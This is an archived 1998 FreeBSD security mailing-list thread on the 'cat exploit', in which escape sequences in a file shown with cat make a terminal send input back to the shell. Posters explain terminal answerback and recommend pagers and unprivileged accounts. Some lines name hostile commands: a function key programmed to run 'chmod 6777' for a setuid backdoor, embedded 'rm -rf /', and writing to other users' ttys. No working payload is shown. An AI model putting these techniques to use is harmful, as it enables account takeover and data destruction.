Richards) cc: security@FreeBSD.ORG Subject: Re: cat exploit In-reply-to: Your message of "Thu, 10 Sep 1998 13:14:53 -0300." <199809101614.NAA07518@dragon.acadiau.ca> Date: Thu, 10 Sep 1998 19:46:10 +0200 Message-ID: <4712.905449570@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199809101614.NAA07518@dragon.acadiau.ca>, Michael Richards writes: >Hi. > >Is it just me or did everyone miss the point of Jay's message? > >What would happen if I created a file called README that was binary. Since >Jay accidentally had the cat'd sendmail.st execute the command "xtermxterm" >then wouldn't it be possible to create a file (like the README) the people >would be tricked into catting that would run commands as them? What happens here is that a specific esc-mumble sequence prompts the terminal to identify itself, hence the xterm response. This is a very old exploit, it worked on all async terminals that could program the function keys by escape sequences. You'd get the key closest to ESC to send something like: chmod 6777 /some/file/I/have/waiting/for/the/victim echo -n 'whatever it takes to clear the screen' exit 0 and next time the victim almost hit ESC in vi, you had a shell to his account waiting for you. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." "ttyv0" -- What UNIX calls a $20K state-of-the-art, 3D, hi-res color terminal To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 10:58:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA17523 for freebsd-security-outgoing; Thu, 10 Sep 1998 10:58:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from phoenix.volant.org (phoenix.volant.org [205.179.79.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA17512 for ; Thu, 10 Sep 1998 10:58:22 -0700 (PDT) (envelope-from patl@phoenix.volant.org) From: patl@phoenix.volant.org Received: from asimov.phoenix.volant.org ([205.179.79.65]) by phoenix.volant.org with smtp (Exim 1.92 #8) id 0zHAyo-00041l-00; Thu, 10 Sep 1998 10:58:02 -0700 Received: from localhost by asimov.phoenix.volant.org (SMI-8.6/SMI-SVR4) id KAA25298; Thu, 10 Sep 1998 10:57:59 -0700 Date: Thu, 10 Sep 1998 10:57:59 -0700 (PDT) Reply-To: patl@phoenix.volant.org Subject: Re: cat exploit To: Jay Tribick cc: security@FreeBSD.ORG In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > That's exactly what I was saying - just for example, say your installing > something as root you usually cat the file INSTALL to find out what > you need to do - it would be relatively simple to embed a command > in there to just rm -rf / & your hd! No, I usually 'less', 'more', or even 'emacs' it. For two reasons. 1) INSTALL is usually too large to fit in a single terminal window; sometimes too large to fit in the default scrollbuffer. 2) It might contain characters that would make my terminal window do something I'd rather it didn't... Cat should only be used to view files that are known to be small and clean. (E.g., /etc/motd) If there is -any- doubt at all you should use more, less, emacs, hd, or some other tool that is more terminal-aware and will convert 'unprintable' characters. -Pat To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 11:03:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA18895 for freebsd-security-outgoing; Thu, 10 Sep 1998 11:03:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gutenberg.uoregon.edu (gutenberg.uoregon.edu [128.223.56.211]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA18888 for ; Thu, 10 Sep 1998 11:03:05 -0700 (PDT) (envelope-from sharding@gutenberg.uoregon.edu) Received: from localhost (sharding@localhost) by gutenberg.uoregon.edu (8.9.1/8.9.1) with SMTP id LAA00437; Thu, 10 Sep 1998 11:07:03 -0700 (PDT) Date: Thu, 10 Sep 1998 11:07:03 -0700 From: Sean Harding Reply-To: Sean Harding To: Jay Tribick cc: security@FreeBSD.ORG Subject: Re: cat exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 10 Sep 1998, Jay Tribick wrote: > something as root you usually cat the file INSTALL to find out what > you need to do - it would be relatively simple to embed a command > in there to just rm -rf / & your hd! I agree that this is a problem...However, your example is yet another good reason to do as little as root as possible. You should read all of the documentation and build the software as a normal user. Only su or sudo for the 'make install' command... Sean -- Sean Harding sharding@oregon.uoregon.edu|"They burn their bridges as they http://gladstone.uoregon.edu/~sharding/ | go." Consulting: http://www.efn.org/~seanh | --Natalie Merchant To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 11:14:55 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA21571 for freebsd-security-outgoing; Thu, 10 Sep 1998 11:14:55 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dt053nb4.san.rr.com (dt053nb4.san.rr.com [204.210.34.180]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA21566 for ; Thu, 10 Sep 1998 11:14:53 -0700 (PDT) (envelope-from Studded@dal.net) Received: from dal.net (Studded@localhost [127.0.0.1]) by dt053nb4.san.rr.com (8.8.8/8.8.8) with ESMTP id LAA22364; Thu, 10 Sep 1998 11:14:29 -0700 (PDT) (envelope-from Studded@dal.net) Message-ID: <35F81705.A5B83D3B@dal.net> Date: Thu, 10 Sep 1998 11:14:29 -0700 From: Studded Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.06 [en] (X11; I; FreeBSD 2.2.7-STABLE-0905 i386) MIME-Version: 1.0 To: Mikael Karpberg CC: Jay Tribick , freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) References: <199809101618.SAA10499@ocean.campus.luth.se> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mikael Karpberg wrote: > > According to Jay Tribick: > > bofh$ cat sendmail.st > > `ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm > > su: xtermxterm: command not found > > bofh$ > > > > This seems quite scarey to me, couldn't someone embed 'rm -rf /' > > within a text file and then, if root cats the file it nukes > > their system? > > I'm not completely clear on what that is, but I've seen it also. What I > _am_ completely clear about is that it's got nothing to do with cat, and > instead everything to do with xterm. No no, you've missed an important point here. You shouldn't use cat routinely to view files, you should use less or more. This will help to avoid problems like this. By default less won't even open binary files. Doug -- *** Chief Operations Officer, DALnet IRC network *** "Yes, the president should resign. He has lied to the American people, time and time again, and betrayed their trust. He is no longer an effective leader. Since he has admitted guilt, there is no reason to put the American people through an impeachment. He will serve absolutely no purpose in finishing out his term; the only possible solution is for the president to save some dignity and resign." - William Jefferson Clinton, 1974 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 11:30:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA24659 for freebsd-security-outgoing; Thu, 10 Sep 1998 11:30:38 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from smtp03.primenet.com (smtp03.primenet.com [206.165.6.133]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA24645; Thu, 10 Sep 1998 11:30:28 -0700 (PDT) (envelope-from tlambert@usr08.primenet.com) Received: (from daemon@localhost) by smtp03.primenet.com (8.8.8/8.8.8) id LAA29902; Thu, 10 Sep 1998 11:30:18 -0700 (MST) Received: from usr08.primenet.com(206.165.6.208) via SMTP by smtp03.primenet.com, id smtpd029774; Thu Sep 10 11:30:07 1998 Received: (from tlambert@localhost) by usr08.primenet.com (8.8.5/8.8.5) id LAA27149; Thu, 10 Sep 1998 11:30:03 -0700 (MST) From: Terry Lambert Message-Id: <199809101830.LAA27149@usr08.primenet.com> Subject: Re: FreeBSD Hardening To: andrew@squiz.co.nz Date: Thu, 10 Sep 1998 18:30:03 +0000 (GMT) Cc: enkhyl@hayseed.net, security@FreeBSD.ORG, current@FreeBSD.ORG In-Reply-To: from "Andrew McNaughton" at Sep 10, 98 03:10:30 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > To get to a point where you can declare a piece of code correct is a > difficult thing to do, and is prone to getting it wrong. To find > something that needs fixing generally isn't all that difficult. Actually, if your code is in vanilla K&R C, or can be preprocessed into it (using the __P() macro and friends), then there is a tool in the comp.sources.c++ archives that can perform full branch-path analysis. This allows you to automatically generate code-coverage tests, which in turn allows you to build specification/validation tests by covering the boundary conditions noted in the branch paths. Taken together, this is most of the way to a "correctness proof". Now if instead of writing your unit tests in C (or some other languages, you instead write a data interface specification using the TET or ETET tool sets that are publically available (and were distributed by UNIX International), and which have, themselves, been tested for correctness with tools like "BattleMap", then you can come very close to closure on the idea of correctness. To handle the final boundary cases, you need to independently generate test data from two sources, tsort it, and compare the two for discrepancies. This is not impossible, but it is a lot of work. Most probably, you could get 95% of the way there merely by hand-coding the unit tests after the analysis, which is 95% better than where things stand today. See the comp.sources archives on gatekeeper.dec.com for the source code for the tool. Terry Lambert terry@lambert.org --- Any opinions in this posting are my own and not those of my present or previous employers. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 11:36:29 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA26326 for freebsd-security-outgoing; Thu, 10 Sep 1998 11:36:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from Kitten.mcs.com (Kitten.mcs.com [192.160.127.90]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA26311 for ; Thu, 10 Sep 1998 11:36:25 -0700 (PDT) (envelope-from karl@Jupiter.Mcs.Net) Received: from Jupiter.Mcs.Net (karl@Jupiter.mcs.net [192.160.127.88]) by Kitten.mcs.com (8.8.7/8.8.2) with ESMTP id NAA17517; Thu, 10 Sep 1998 13:36:16 -0500 (CDT) Received: (from karl@localhost) by Jupiter.Mcs.Net (8.8.7/8.8.2) id NAA13435; Thu, 10 Sep 1998 13:36:15 -0500 (CDT) Message-ID: <19980910133615.A13227@Mcs.Net> Date: Thu, 10 Sep 1998 13:36:15 -0500 From: Karl Denninger To: Garrett Wollman , Josef Karthauser Cc: Jay Tribick , freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) References: <19980910144324.B831@pavilion.net> <199809101510.LAA08830@khavrinen.lcs.mit.edu> <19980910165725.N831@pavilion.net> <199809101622.MAA09014@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199809101622.MAA09014@khavrinen.lcs.mit.edu>; from Garrett Wollman on Thu, Sep 10, 1998 at 12:22:09PM -0400 Organization: Karl's Sushi and Packet Smashers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 10, 1998 at 12:22:09PM -0400, Garrett Wollman wrote: > < said: > > >> That's why you should normally use `more' or `less'. > > > Ok, but how come the interactions we describe? > > Most terminals, including the VT102 emulated by `xterm', include some > mechanism for generating an ``answerback'' upon receipt of a special > control code or sequence. (In xterm's case, that happens to be a > control-E.) A binary file is likely enough to contain such a code. > > There's might be a preference you can set which will disable this > feature in xterm, but I don't know what it might be (and if there is > one, it's not documented). > > -GAWollman Actually, for VTxxx series terminals (and good emulators of them) as well as most others, the problem is far worse. Most terminals can be made to display something, set the cursor to where the "something" is, and then *send the line containing the something to the host*. This allows ARBITRARY commands to be accidentially (read: maliciously) executed by someone doing nothing more than displaying a file! This is an OLD trick, but one which still works, and if the person doing the tricking is crafty it can be particularly dangerous. (Consider that most termainls also have attributes such as "invisible" text available, and/or that you can send the line, then back up again and overwrite it). I can craft a 40-50 byte sequence that will, if the file is "catted" as root, give me an instant SUID root shell somewhere on the system that you're very unlikely to find. Indiscriminately displaying files without terminal control enforced (ie: by a pager) is EXTREMELY dangerous, especially if you're running with privileges (ie: as root). -- -- Karl Denninger (karl@denninger.net) Voice: 312-803-6271 x219 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 12:09:17 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA01126 for freebsd-security-outgoing; Thu, 10 Sep 1998 12:09:17 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from alpha.sea-to-sky.net (alpha.sea-to-sky.net [204.244.200.240]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA01111 for ; Thu, 10 Sep 1998 12:09:13 -0700 (PDT) (envelope-from sreid@alpha.sea-to-sky.net) Received: (from sreid@localhost) by alpha.sea-to-sky.net (8.9.1a/8.8.7) id MAA21122; Thu, 10 Sep 1998 12:06:20 -0700 Date: Thu, 10 Sep 1998 12:06:20 -0700 (PDT) From: Steve Reid To: Jay Tribick cc: security@FreeBSD.ORG Subject: Re: cat exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 10 Sep 1998, Jay Tribick wrote: > cat the file INSTALL to find out what you need to do - it would be > relatively simple to embed a command in there to just rm -rf / & your > hd! steve@BitBucket:/home/steve% cat /dev/urandom [barf] ^C steve@BitBucket:/home/steve% 1;2cxterm1;2cxterm1;2cxterm1;2c1;2cx term1;2c1;2cxterm1;2c1;2c I tried it several times and I couldn't get it to produce anything other than "1;2c" and "xterm", although it did completely freeze my xterm once (scrollbars didn't even work). It never seemed to embed an enter character. I have, on occasion, cat'ed a file and seen the "zsh: command not found: xtermxtermxterm" but I think that was caused by me typing ahead without noticing the extra garbage on the command line. In any case, it looks like the worst that could happen is that a binary named with some combination of those strings could be exectued, IF IT IS IN YOUR PATH. I can't think of any "evil" command that can be built using just those strings. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 12:09:56 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA01209 for freebsd-security-outgoing; Thu, 10 Sep 1998 12:09:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dt053nb4.san.rr.com (dt053nb4.san.rr.com [204.210.34.180]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA01197 for ; Thu, 10 Sep 1998 12:09:49 -0700 (PDT) (envelope-from Studded@dal.net) Received: from dal.net (Studded@localhost [127.0.0.1]) by dt053nb4.san.rr.com (8.8.8/8.8.8) with ESMTP id LAA22396; Thu, 10 Sep 1998 11:22:03 -0700 (PDT) (envelope-from Studded@dal.net) Message-ID: <35F818CA.8647A116@dal.net> Date: Thu, 10 Sep 1998 11:22:02 -0700 From: Studded Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.06 [en] (X11; I; FreeBSD 2.2.7-STABLE-0905 i386) MIME-Version: 1.0 To: Michael Richards <026809r@dragon.acadiau.ca> CC: security@FreeBSD.ORG Subject: Re: cat exploit References: <199809101614.NAA07518@dragon.acadiau.ca> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Michael Richards wrote: > > Hi. > > Is it just me or did everyone miss the point of Jay's message? It seems to me that a lot of people missed the point of one of the warnings that someone else posted in response actually. Don't use cat routinely to view files. Use more, or better yet less since less doesn't view binary files by default. Doug -- *** Chief Operations Officer, DALnet IRC network *** "Yes, the president should resign. He has lied to the American people, time and time again, and betrayed their trust. He is no longer an effective leader. Since he has admitted guilt, there is no reason to put the American people through an impeachment. He will serve absolutely no purpose in finishing out his term; the only possible solution is for the president to save some dignity and resign." - William Jefferson Clinton, 1974 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 12:12:36 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA01725 for freebsd-security-outgoing; Thu, 10 Sep 1998 12:12:36 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cain.tasam.com (cain.tasam.com [198.232.144.253]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA01699 for ; Thu, 10 Sep 1998 12:12:32 -0700 (PDT) (envelope-from cain@cain.tasam.com) Received: from localhost (cain@localhost) by cain.tasam.com (8.8.8/8.8.8) with SMTP id PAA06630 for ; Thu, 10 Sep 1998 15:11:28 -0500 (EST) (envelope-from cain@cain.tasam.com) Date: Thu, 10 Sep 1998 15:11:27 -0500 (EST) From: Cain To: freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) In-Reply-To: <35F7C4A7.12C2A1C7@kew.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The man page is nice... but that doesn't address what the original message was. More on the original, when I use netterm to get into my box, and cat a binary, I end up having NETTERM echo to my screen a bunch of times. But this is most likely to be because your terminal prgram interprets some of the binary file to be certian commands. If you cat sendmail.st to your printer, some will most likely be bold, some will be underlined maybe.. all sorts of wierd stuff will happne. This probably isn't a problem with cat, but I can't say I'm shure.. On Thu, 10 Sep 1998, Drew Derbyshire wrote: > Jay Tribick wrote: > > Was just having a look in /var/log the other day and spotted > > a file called sendmail.st, wondering what it was I cat'd it > > and here's what it did: > > Quote without comment ... > > MAILSTATS(8) FreeBSD System Manager's Manual MAILSTATS(8) > > NAME > mailstats - display mail protocol statistics > > SYNOPSIS > mailstats [-o] [-C sendmail.cf] [-f sendmail.st] > > DESCRIPTION > Mailstats displays mail statistics on a per mailer basis. Each line of > output contains the mailer number, the count and byte-count of incoming > messages, the count and byte-count of outgoing messages, and the name of > the mailer unless the -o flag is specified. Common mailers include smtp > and local (eg: mail.local, the program which handles local delivery of > mail). > > Statistics are read from the sendmail statistics file sendmail.st, the > location of which is defined in sendmail.cf, or specified with the -f > flag. Mailers are likewise defined in the sendmail.cf file. Statistics > are cumulative; zero the statistics file to reset the counters. > > FILES > /etc/sendmail.cf sendmail configuration file > /var/log/sendmail.st sendmail statistics file > > SEE ALSO > mail.local(8), sendmail(8) > > > BSD August 13, 1996 1 of the message > > > -- > Drew Derbyshire UUPC/extended e-mail: software@kew.com > Telephone: 617-279-9812 > > "For every bug fixed, there is a bigger bug not yet discovered." > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 12:18:36 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA02935 for freebsd-security-outgoing; Thu, 10 Sep 1998 12:18:36 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cain.tasam.com (cain.tasam.com [198.232.144.253]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA02917 for ; Thu, 10 Sep 1998 12:18:32 -0700 (PDT) (envelope-from cain@cain.tasam.com) Received: from localhost (cain@localhost) by cain.tasam.com (8.8.8/8.8.8) with SMTP id PAA06638 for ; Thu, 10 Sep 1998 15:17:30 -0500 (EST) (envelope-from cain@cain.tasam.com) Date: Thu, 10 Sep 1998 15:17:30 -0500 (EST) From: Cain To: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Hardening In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I was going to attempt to contribute until school started back up suddenly, but I can host a mailing list off of my server in an attempt to contribute something... I have found a few problems and have aptches for them, but I was waiting to find a few more as they aren't very high risk to post them anywhere.. On Thu, 10 Sep 1998, andrewr wrote: > > > On Wed, 9 Sep 1998, Enkhyl wrote: > > > Back when the popper buffer overflow bug sprang forth it was suggested > > that it might be a good idea to go through the OpenBSD change logs and > > evaluate security-related fixes for inclusion in FreeBSD. Is there anyone > > actively working on this? If there is a project organized around this, I'm > > willing to help out with the endeavor. Otherwise, I'm willing to embark on > > this endeavor and make a project out of it. > > This kind of died due to lack of interest. As I was told by jkh, if one > is interested enough in this, just start up a mailing list (not from > FreeBSD.org) and a team of workers and get to it. Soon, if all goes well, > it would be incorporated into the actual project. Good luck. > > Andrew > > > > > Comments? > > > > -- > > Christopher Nielsen > > Scient: The Art and Science of Electronic Business > > cnielsen@scient.com > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 12:38:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA07150 for freebsd-security-outgoing; Thu, 10 Sep 1998 12:38:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA07045 for ; Thu, 10 Sep 1998 12:37:49 -0700 (PDT) (envelope-from mark@grondar.za) Received: from grondar.za (IDENT:SSiK1qtMBNulkbU3NYkIpzKH0dKpkC0y@localhost [127.0.0.1]) by gratis.grondar.za (8.9.1/8.9.1) with ESMTP id VAA20286; Thu, 10 Sep 1998 21:37:00 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199809101937.VAA20286@gratis.grondar.za> To: ben@rosengart.com cc: Jay Tribick , security@FreeBSD.ORG Subject: Re: cat exploit In-Reply-To: Your message of " Thu, 10 Sep 1998 13:44:03 -0400." References: Date: Thu, 10 Sep 1998 21:36:56 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Snob Art Genre wrote: > 1) No, you use less. ... or view(1) or more(1) or.... NOT cat(1). > 2) So you've figured out how to execute arbitrary commands from this? > I'm not saying that's not possible, but so far the only thing this > "bug" does is output the name of xterm. Most modern terminals (and emulators) can be programmed to do wierd things. Wierd things such as "when your user types key , send sequence " for various definitions of and . This used to be an attack at universities-with-mainframes when students actually read manuals. Login: me Password: $ Message from badguy: 'elgj' qerjgp'adl'glkJSFL'Kdfjmf'sd;lkf;sdf $ logout (response to "w" from user). M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 12:41:13 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA08048 for freebsd-security-outgoing; Thu, 10 Sep 1998 12:41:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (pppk-12.igrin.co.nz [202.49.245.91]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA08012 for ; Thu, 10 Sep 1998 12:40:57 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id HAA05173; Fri, 11 Sep 1998 07:40:00 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Fri, 11 Sep 1998 07:39:59 +1200 (NZST) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Jay Tribick cc: freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 10 Sep 1998, Jay Tribick wrote: > | >Was just having a look in /var/log the other day and spotted > | >a file called sendmail.st, wondering what it was I cat'd it > | >and here's what it did: > | > > | >bofh$ cat sendmail.st > | >`ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm > | >su: xtermxterm: command not found > | >bofh$ > | > > | >This seems quite scarey to me, couldn't someone embed 'rm -rf /' > | >within a text file and then, if root cats the file it nukes > | >their system? > | It is a binary file. > | Terminals don't like it when you cat a binary. > > It's not the fact that it was a binary that puzzled me but that > it had managed to execute a command on the shell just by me > cat'ing the file. Forgot to mention that it was in an xterm > and doesn't affect Virtual Consoles. This is the key point. If you could get something executed merely by having it passed to a terminal then all sorts of exploits presumably become possible. I haven't gone through the binary you sent, and I don't know very much about xterm escape sequences and so forth, but scanning through the man page for xterm, the 'string' action stands out as potentially highly dangerous unless care has been taken to limit it's impact. I tried cat'ing a couple of binaries and sure enough I got heaps of 'command not found' errors. all of them are full of 'xtermxterm' type stuff which leads me to believe that dangerous text gets this substituted into what goes to the shell. Probably this means it's mostly safe. If an attacker can get an executable file into the path with a name like '2cxterm1' then they can use this mechanism to get it executed. There might be an occasion where this was useful, but mostly an account is not much more secure than it's path anyway. Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 12:51:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA09521 for freebsd-security-outgoing; Thu, 10 Sep 1998 12:51:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hwhlap.hjns.net (hwhlap.hjns.net [207.213.153.54]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA09506 for ; Thu, 10 Sep 1998 12:51:47 -0700 (PDT) (envelope-from hwh@hwhlap.hjns.net) Received: from hwhlap.hjns.net (localhost [127.0.0.1]) by hwhlap.hjns.net (8.8.8/8.8.8) with ESMTP id MAA03493 for ; Thu, 10 Sep 1998 12:51:38 -0700 (PDT) (envelope-from hwh@hwhlap.hjns.net) Message-Id: <199809101951.MAA03493@hwhlap.hjns.net> To: security@FreeBSD.ORG Subject: Re: cat exploit Date: Thu, 10 Sep 1998 12:51:37 -0700 From: Harold Hankins Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jay Tribick wrote: >> That's exactly what I was saying - just for example, say your installing >> something as root you usually cat the file INSTALL to find out what >> you need to do - it would be relatively simple to embed a command i>> n there to just rm -rf / & your hd! One of the first rules of unix admin is NEVER cat a file to your terminal. This is an old security hole, I thought everyone knew about it. Maybe its been too long since it was exploited and its been forgotten. A little background for newcomers to unix administration: Most terminals had escape sequences not only to answerback but also to send all or part of the screen contents back to the host. This was used to allow us to write "forms" on the screen, let the user fill it in, and then let the program ask the terminal to send the answers back to it for processing. It was also used to allow us to read back the contents of the screen so we could send it to lpr to do a screen print. It also opened up the possibility of abuse by embedding the escape sequences in text files as you found. We also sometimes cat'ed the escape sequences to other peoples terminals by using a command like 'cat abc.txt >/dev/tty1a' to send commands to other peoples terminals. Mostly it was harmless fun like sending hundreds of bell characters but some people actually sent commands to delete files or do other nasty things. Harold Hankins -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 13:08:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA13150 for freebsd-security-outgoing; Thu, 10 Sep 1998 13:08:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dfw.nationwide.net (dfw.nationwide.net [198.175.15.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA13137 for ; Thu, 10 Sep 1998 13:08:06 -0700 (PDT) (envelope-from aleph1@dfw.net) Received: from localhost (aleph1@localhost) by dfw.nationwide.net (8.9.0/8.9.0) with SMTP id PAA17800; Thu, 10 Sep 1998 15:01:33 -0500 (CDT) Date: Thu, 10 Sep 1998 15:01:32 -0500 (CDT) From: Aleph One X-Sender: aleph1@dfw.nationwide.net To: "Jordan K. Hubbard" cc: Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG Subject: Re: cat exploit In-Reply-To: <17574.905449550@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 10 Sep 1998, Jordan K. Hubbard wrote: > The problem is that Jay's message didn't actually have a point. :) > > Rather, it described a symtom common to most VT100 compliant terminal > emulators and something very clearly under the "well don't DO that then" > category. It's nothing new at all and if you're not sure of the > contents of a file, don't just blindly cat it to your screen. The > same goes for any binary I might hand you - if I put up a file on > an FTP site called ``megaspacewar.exe'' and you go and run it on your > Windows box and it trojans you to death (or worse), who's fault is > that? :-) Same basic issue. Whoa! If you dont know the contents of a file dont read it. If you dont read a file you dont know its contents. Thats some really useful suggestion. How about something more practical? Like being able to turn off this 